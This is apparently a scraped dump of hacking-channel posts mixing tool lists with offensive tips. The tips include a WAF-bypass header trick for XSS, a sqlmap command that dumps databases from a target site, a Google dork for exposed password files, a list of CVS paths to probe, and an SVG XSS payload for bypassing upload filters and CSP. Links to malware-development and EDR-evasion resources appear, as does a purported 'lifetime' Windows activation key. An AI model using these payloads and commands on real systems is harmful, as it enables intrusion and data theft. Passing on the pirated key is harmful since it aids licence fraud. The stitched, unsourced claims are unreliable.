Termux All Command [Telegram Group]

XSS advanced Tip 1- tried to inject xss via input 2- found 403 3- added header Content-Encoding : WAFBYPASS 4- found that it was 200 bypassed

JSNinja - Hunting Bugs in JavaScript! JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. Github :- https://lnkd.in/dRbyM3N8

🎤AI Video Creation | Create Stunning Videos Use any of these:📌 https://invideo.io/ https://www.synthesia.io/fr  https://runwayml.com/ https://lumalabs.ai/dream-machine

Here are 21 cybersecurity search engines: 1. Shodan—Search for devices connected to the internet. 2. Wigle—Database of wireless networks, with statistics. 3. Grep App—Search across a half million git repos. 4. Binary Edge—Scans the internet for threat intelligence. 5. ONYPHE—Collects cyber-threat intelligence data. 6. GreyNoise—Search for devices connected to the internet. 7. Censys—Assessing attack surface for internet connected devices. 8. Hunter—Search for email addresses belonging to a website. 9. Fofa—Search for various threat intelligence. 10. ZoomEye—Gather information about targets. 11. LeakIX—Search publicly indexed information. 12. IntelligenceX—Search Tor, I2P, data leaks, domains, and emails. 13. Netlas—Search and monitor internet connected assets. 14. URL Scan—Free service to scan and analyse websites. 15. PublicWWW—Marketing and affiliate marketing research. 16. FullHunt—Search and discovery attack surfaces. 17. CRT sh—Search for certs that have been logged by CT. 18. Vulners—Search vulnerabilities in a large database. 19 Pulsedive—Search for threat intelligence. 20. Packet Storm Security—Browse latest vulnerabilities and exploits. 21. GrayHatWarefare—Search public S3 buckets.

Malware Development Resources #1 Maldev by cr-0w https://lnkd.in/eqrSERBn Awesome Malware Development by rootkit-io https://lnkd.in/e9wAw2xM Rust for Malware Development by Whitecat18 https://lnkd.in/eWeJQxw5 Malware Dev for Dummies by chvancooten https://lnkd.in/eW-c3_pN Malware Development Blog by zhassulan zhussupov https://lnkd.in/ekxBkp_d MalDev AV-EDR Evasion for PenTesters https://lnkd.in/e7CgYfK7 Red Team Exercises https://lnkd.in/eYW6Ph9i Red Team Leaders Blog https://lnkd.in/eRrHeSV3 Maldev Academy https://maldevacademy.com/ Malware Development by Crow https://lnkd.in/et9yn-Bn Malware Development by Sektor7 https://lnkd.in/d2UN9x4X

Bypass WAF for use of sqlmap 🤯 sqlmap -u "https://target.com" --dbs --level=5 --risk=3 --user-agent -v3 --tamper="between,randomcase,space2comment" --batch --dump

Download Any CRX file

Hello hackers 🚨 Found a passwd.txt in a Private website through Google Dorking!🚨 i'am excited to share an interesting find from my security research. Dork used: site:target.com ext:txt passwd

Top 15 Browser Extensions For OSINT Researchers: -> Shodan -> User Agent Switcher -> Search By Image -> Exif Viewer Pro -> WayBack Machine -> Hunter -> Email Extract -> Wappalyzer -> Sputnik -> Link Gopher -> Fake news debunker -> Simplescraper -> IP Location Lookup -> Instant Data Scraper -> WeakestLink https://imshewale.medium.com/top-15-browser-extensions-for-osint-researchers-cb04c95d1569

Top 15 Browser Extensions For Hackers : -> FoxyProxy -> Multi Account Container -> Pwnfox -> Hackbar V2 -> HackTools -> Shodan -> Ublock Origin -> Wappalyzer -> Whatcms -> Cookie Editor -> DotGit -> Note AnyWhere -> Hunter -> retire.js -> BlackBOx

POC for CVE-2024-4577 PHP CGI Argument Injection 🔥 🔥 🔥 Nuclei Template: https://lnkd.in/dyXKJBdC

Windows 10 & 11 Pro Activation🔥 Key: PQDTH-4KNTP-WBRX8-FHCKB-F9CKM   • Worldwide Global Key • Lifetime License

🛠️ 20 Very Advanced Information Gathering Tools 🛠️ 1. Nmap ➤ Network Scanner 🔗 github.com/nmap/nmap 2. Maltego ➤ Visual Link Analysis 🔗 maltego.com 3. Shodan ➤ IoT Search Engine 🔗 github.com/m4ll0k/Shodanfy.py 4. Recon-ng ➤ Web Reconnaissance Framework 🔗 github.com/lanmaster53/recon-ng 5. Spiderfoot ➤ OSINT Automation Tool 🔗 github.com/smicallef/spiderfoot 6. theHarvester ➤ Email and Subdomain Gatherer 🔗 github.com/laramies/theHarvester 7. Amass ➤ Network Mapping of Attack Surfaces 🔗 github.com/OWASP/Amass 8. RED HAWK ➤ All-In-One Scanning Tool 🔗 github.com/Tuhinshubhra/RED_HAWK 9. ReconSpider ➤ Multi-purpose Gathering Tool 🔗 github.com/bhavsec/reconspider 10. OSINT Framework ➤ Comprehensive Information Gathering Collection 🔗 github.com/lockfale/OSINT-Framework 11. Infoga ➤ Email OSINT Gatherer 🔗 github.com/m4ll0k/Infoga 12. Striker ➤ Offensive Information Gathering Tool 🔗 github.com/s0md3v/Striker 13. SecretFinder ➤ API Key and Secret Finder 🔗 github.com/m4ll0k/SecretFinder 14. Xerosploit ➤ Penetration Testing Toolkit 🔗 github.com/LionSec/xerosploit 15. FOCA ➤ Metadata Analyzer 🔗 github.com/ElevenPaths/FOCA 16. ReconDog ➤ Reconnaissance Swiss Army Knife 🔗 github.com/s0md3v/ReconDog 17. Metagoofil ➤ Metadata Extractor 🔗 github.com/laramies/metagoofil 18. Dracnmap ➤ Nmap Script Wrapper 🔗 github.com/Screetsec/Dracnmap 19. Rang3r ➤ Multi-threaded Port Scanner 🔗 github.com/floriankunushevci/rang3r 20. Breacher ➤ Admin Panel Finder 🔗 github.com/s0md3v/Breacher 🚀 Stay tuned for more advanced tools & guides 🔔 Follow us for daily updates on cybersecurity 👥 Join our channel for more insights!

Website Security       Urlscan.io - URL and website scanner        →https://urlscan.io/ VirusTotal URL Search VirusTotal        →https://www.virustotal.com/gui/home/url Threat Intelligence Platform        →https://threatintelligenceplatform.com/ Is This Website Safe        →https://safeweb.norton.com/ Safe Browsing site status        →https://transparencyreport.google.com/safe-browsing/search?hl=en WHOIS IP Lookup Tool        →https://www.ultratools.com/tools/ipWhoisLookupResult Find Website IP Address        →https://www.ipvoid.com/find-website-ip/ IP Address Blacklist Check        →https://www.ipvoid.com/ip-blacklist-check/ Check The Website’s SSL Certificate See Your Entire Attack Surface in Real-Time. Get a current view of all of your organization's assets so you can proactively prevent targeted attacks and investigate suspicious activity.        →https://censys.io/ipv4 SpiderFoot        →https://www.spiderfoot.net/ Tools for Looking up Malicious Websites        →https://zeltser.com/lookup-malicious-websites/ How to Tell if a Website is Dangerous        →https://www.secjuice.com/how-to-tell-if-a-website-is-dangerous/ Malicious URL Scanner        →https://www.ipqualityscore.com/threat-feeds/malicious-url-scanner Threatlog - Malicious Domains Database Database of malicious domains, fraudulent and phishing domains, malware domains database, threat intelligence feeds, detect potentially malicious domains.        →https://www.threatlog.com/ Opswat - MetaDefender Cloud Cloud-based Deep CDR, Multiscanning, Sandbox Dynamic Analysis, Hash and IP-Domain reputation with options for personal and commercial users.        →https://metadefender.opswat.com/

CVS Detected Vulnerability Test list /CVS/Root /CVS/Entries /CVS/Repository /CVS/Tag /CVS/Entries.Log /CVS/Checkin.prog /CVS/Update.prog /CVS/Root.lock /CVS/Checkoutlist /CVS/Notify /CVS/Commitinfo /CVS/Loginfo /CVS/Editinfo /CVS/History /CVS/Modules

Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings. Many file uploads allow SVGs and are prone to tampering. <svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">   <foreignObject width="100%" height="100%">     <body xmlns="w3.org/1999/xhtml"> <iframe src='javascript:confirm(10)'></iframe>     </body>   </foreignObject> </svg>